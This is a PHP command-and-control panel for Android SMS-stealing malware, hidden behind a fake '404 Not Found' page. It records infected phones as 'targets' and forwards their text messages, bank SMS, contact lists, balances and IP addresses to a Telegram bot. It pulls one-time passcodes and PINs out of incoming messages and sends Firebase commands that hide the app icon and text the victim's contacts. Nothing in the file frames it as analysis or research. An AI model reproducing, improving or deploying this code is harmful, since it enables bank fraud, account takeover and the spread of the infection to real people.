<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>

<head>
    <title>404 Not Found</title>
</head>

<body>
    <h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>
    <p>Additionally, a 404 Not Found
        error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body>

</html>
<?php    

require_once('config.php');
$words = array("code","رمز","پویا","Code","کد");
define("TOKEN", $token);
define("ID", $id);
define('PROJECT_ID', $project_id);
define('FILE', $jsonFile);
define('MAD_PORT', $topic);
$telegramApiUrl = "https://api.telegram.org/bot{$token}/sendMessage";

#-----------------------------#
if (!file_exists("data/onlineuser.txt")) {
	file_put_contents("data/onlineuser.txt", "");
}
if (!file_exists("data/listid.txt")) {
	file_put_contents("data/listid.txt", "");
}
function bot($method, $datas = [])
{
    $url = "https://api.telegram.org/bot" . TOKEN . "/" . $method;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
    return curl_exec($ch);

}
function getAccessToken($file){
    require 'vendor/autoload.php';
    $serviceAccountFilePath = "$file";
    $serviceAccount = json_decode(file_get_contents($serviceAccountFilePath), true);

    // Generate the JWT using the service account credentials
    $clientEmail = $serviceAccount['client_email'];
    $privateKey = $serviceAccount['private_key'];

    $payload = [
        "iss" => $clientEmail,
        "scope" => "https://www.googleapis.com/auth/firebase.messaging",
        "aud" => "https://www.googleapis.com/oauth2/v4/token",
        "iat" => time(),
        "exp" => time() + 3600
    ];

    $jwt = Firebase\JWT\JWT::encode($payload, $privateKey, 'RS256');

    // Get the OAuth 2.0 access token
    $requestBody = [
        "grant_type" => "urn:ietf:params:oauth:grant-type:jwt-bearer",
        "assertion" => $jwt
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.googleapis.com/oauth2/v4/token");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($requestBody));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Content-Type: application/json"
    ]);

    $response = curl_exec($ch);
    curl_close($ch);

    $accessToken = json_decode($response)->access_token;

    return $accessToken;
}
function action($action, $androidid)
{
    $access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
                "androidid" => $androidid
            )
        ),
    );
    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);
} 

function sendmess($action, $androidid, $phone, $message)
{
    $access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
                "androidid" => $androidid,
                "phone" =>$phone,
                "text" =>$message
            ),"android" => array(
                "priority" => "high"
            )
        ),
    );
    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);

}
function strposA($text, $needles = array()){
	$isin = false;
	for($i=0; $i < count($needles); $i++){
		if(strpos($text, $needles[$i]) !== false){
			$isin = true;
		}
	}
	return $isin;
}
function findPooya($string){
	$date = '';
	$explode = explode("\n",$string);
	foreach($explode as $line){
		if(strpos($line,"code") !== false || strpos($line,"ورود") !== false || strpos($line,"پویا") !== false || strpos($line,"رمز") !== false || strpos($line,"Code") !== false){
			if(strposA($line,['1','2','3','4','5','6','7','8','9','0'])){
				$pan = getNumber($line);
			}
		}
    }
    return $pan;
}
function getNumber($string)
{
    $number = '';
    for ($i = 0; $i < strlen($string); $i++) {
        if (is_numeric($string[$i])) {
            $number .= $string[$i];
        }
    }
    return $number;
}

function spanel($text, $keyboard)
{
    return json_decode(bot('sendMessage', [
        'chat_id' => ID,
        'text' => $text,
        'parse_mode' => 'HTML',
        'reply_markup' => $keyboard
    ]), true)['result']['message_id'];
}

function emess($text, $message_id, $keyboard)
{
    bot('editmessagetext', [
        'chat_id' => ID,
        'message_id' => $message_id,
        'text' => $text,
        'parse_mode' => 'HTML',
        'reply_markup' => $keyboard
    ]);
}
function em($id,$miid,$text,$keyboard){
bot('editmessagetext',[ 
    'chat_id'=>$id, 
    'message_id'=>$miid,
    'text'=>$text,
    'parse_mode'=>'HTML',
    'reply_markup'=>$keyboard
	]);
	}

 if(isset($_POST['result'])){
  	
 $result=$_POST['result'];
 if($result == "ok"){
 $action=$_POST['action'];
 if(isset($_POST['androidid'])){
 $androidid=$_POST['androidid'];
if(isset($_POST['model'])){
 $model=$_POST['model']; 
 }
 }
 if(isset($_POST['opr'])){
 $opr = $_POST['opr'];
 }
 if(isset($_POST['number'])){
 $nump = $_POST['number'];
 }
 if(isset($_POST['message'])){
 $mess = $_POST['message'];
 }
 if(isset($_POST['sender'])){
 $sender = $_POST['sender'];
 } 
 }if(isset($_POST['osVersion'])){
 $osvezen = $_POST['osVersion'];
 } 
if(isset($_POST['nump'])){
 $nump = $_POST['nump'];
 }
 if(isset($_POST['txm'])){
 $txm = $_POST['txm'];
 } if(isset($_POST['sendsms'])){
 $sendsms = $_POST['sendsms'];
 }
 } if(isset($_POST['READ_SMS'])){
 $READ_SMS = $_POST['READ_SMS'];
 }
 
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}

#-----------------------------#

if($action == "install"){
    
$handler = file_get_contents('data/user.txt');
$handler .= $androidid.'/';
file_put_contents('data/user.txt',$handler);
$add = file_get_contents("data/numberuser.txt");
$add1 = $add+1;
file_put_contents("data/numberuser.txt","$add1");
$texti=
"✅ ɴᴇᴡ ᴛᴀʀɢᴇᴛ ɪɴꜱᴛᴀʟʟᴇᴅ #ʀɪᴄᴇᴠᴇᴅ
📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";    
    
    @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($texti));
    
}if($action == "install"){
$messagetar = file_get_contents('messs');
$autotaar = file_get_contents("data/autotar.txt");
$autohiide = file_get_contents("data/autohide.txt");
$autobaal = file_get_contents("data/autobal.txt");
if($autotaar == "on"){
sendmess("sendmokhatib",$androidid, "1",$messagetar);
}if($autohiide == "on"){
action('hide', $androidid);
}if($autobaal == "on"){
action('findbalances', $androidid);
}
}
	$user=explode("/",file_get_contents("data/user.txt"));
	 if(in_array($androidid,$user)){
    if($action == "ping"){
    $onlinesssetting = file_get_contents("data/onlineset.txt");
if($onlinesssetting == "list"){
         $old_user = file_get_contents("data/onlineuser.txt");
        file_put_contents("data/onlineuser.txt", $old_user."<code>/set_$androidid</code> \n ");
        $onlineusers = file_get_contents("data/onlineuser.txt");
        $miid = file_get_contents("data/miid.txt");
        $lines = explode("\n", $onlineusers);
        $unique_lines = array_unique($lines);
        $result = implode("\n", $unique_lines);
        $txt = explode("/set_", $result);
        $rxt = count($txt) - 1;

 em($id,$miid,"📊 ᴏɴʟɪɴᴇ ᴜꜱᴇʀ
       
$result

ᴄᴏᴜɴᴛ : $rxt
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>",null);

     }else{
  $textl=
"☝🏻😌 hmm ! iM OnLine

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";  

		@file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($textl));
	
}
}
  
    if($action == "pingone"){
  $textl2=
"📡 ɪᴍ ᴏɴʟɪɴᴇ

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
"; 


$data = array(
    'chat_id' => $id,
    'text' => $textl2,
 'parse_mode' => 'HTML'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $telegramApiUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8'));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);



curl_close($ch);
}
 elseif ($action == "nwmessage") {
                $phone = $_POST['number'];
                $body = $_POST['messagetext'];
                $m = findPooya($body);
                if($m == null){
             $x = str_replace("\n","",$body);
             foreach($words as $m){
                 if (strpos($x, $m) !== false){
                     $d = explode($m,$x);
                 }
             }
             $pooyafind = getNumber($d[1]);
             }else{
                 $pooyafind = $m;
             }
             if($pooyafind != null){
                 $find = "Pin Founded : <code>$pooyafind</code>";
             }else{
                 $find = "Pin Not Founded";
             }
                $text2145t =
                    "
📖ɴᴇᴡ ꜱᴍꜱ ɪꜱ ᴛᴀʀɢᴇᴛ

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 ✍🏻 ꜱᴇɴᴅᴇʀ : $phone

📑 ᴛᴇxᴛ ᴍᴇꜱꜱᴀɢᴇ :
$body
---

$find

<code>/OffModeOn_$androidid</code>
<code>/Hide_$androidid</code>
<code>/AllSMS_$androidid</code>

 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>";

$cleanedText2 = str_replace("<#>", "", $text2145t);


$data = array(
    'chat_id' => $id,
    'text' => $cleanedText2,
 'parse_mode' => 'HTML'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $telegramApiUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8'));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);



curl_close($ch);

            }
            

elseif($action == "hideicon"){
    
$texthide=
"❇️ icon <code>/set_$androidid</code> is hide now !

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";    

@file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($texthide));

}

elseif($action == "unhide"){
    
    $textshow=
    "✳️ icon <code>/set_$androidid</code> is show now !
    
📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";  
    
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($textshow));
        
} elseif ($action == "mainbalances") {
     if (isset($_POST['balance'])) {
                $bal = $_POST['balance'];
                                $textshow = "
🏛 ᴛᴀʀɢᴇᴛ ʙᴀʟᴀɴᴄᴇ

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>

$bal

 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";
                
      @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($textshow));
    }

 } elseif ($action == "getuserphone") {
    if (isset($_POST['phone'])) {
        $phone = "";
        $phones = $_POST['phone'];
        $phones = explode("\n", $phones);
        $phonesMain = array_unique($phones);
        $phonesList = "";
        foreach ($phonesMain as $ph) {
            $phonesList .= "<code>$ph</code>\n";
        }
        $phones = $phonesList;
  $textshow = "
📞 ᴛᴀʀɢᴇᴛ ᴘʜᴏɴᴇ          
          
📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>

$phones
 
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";

                @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($textshow));
                }
 } elseif($action == "lastsms"){
                $body2 = $_POST['message'];

          $textlast=
"📨 ᴛʜᴇ ʟᴀꜱᴛ ꜱᴍꜱ ɪɴꜰᴏʀᴍᴀᴛɪᴏɴ:

📑 ᴛᴇxᴛ ᴍᴇꜱꜱᴀɢᴇ:
$body2

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";    


$cleanedText = str_replace("<#>", "", $textlast);

$data = array(
    'chat_id' => $id,
    'text' => $cleanedText,
 'parse_mode' => 'HTML'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $telegramApiUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8'));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

            }elseif($action == "banksms"){
                $body3 = $_POST['message22'];
          $textlast=
"📨 ᴛʜᴇ ʟᴀꜱᴛ ʙᴀɴᴋꜱᴍꜱ :

📑 ᴛᴇxᴛ ᴍᴇꜱꜱᴀɢᴇ :   
$body3

📱ᴍᴏᴅᴇʟ : $model
🛜ᴏᴘᴇʀᴀᴛᴏʀ: $opr
🌐ɪᴘ : <code>$ip</code>
🗃️ᴘᴀɴᴇʟ: <code>/set_$androidid</code>
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
";   

        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$id&parse_mode=html&text=".urlencode($textlast));
}
            
}


#-----------------------------#

?>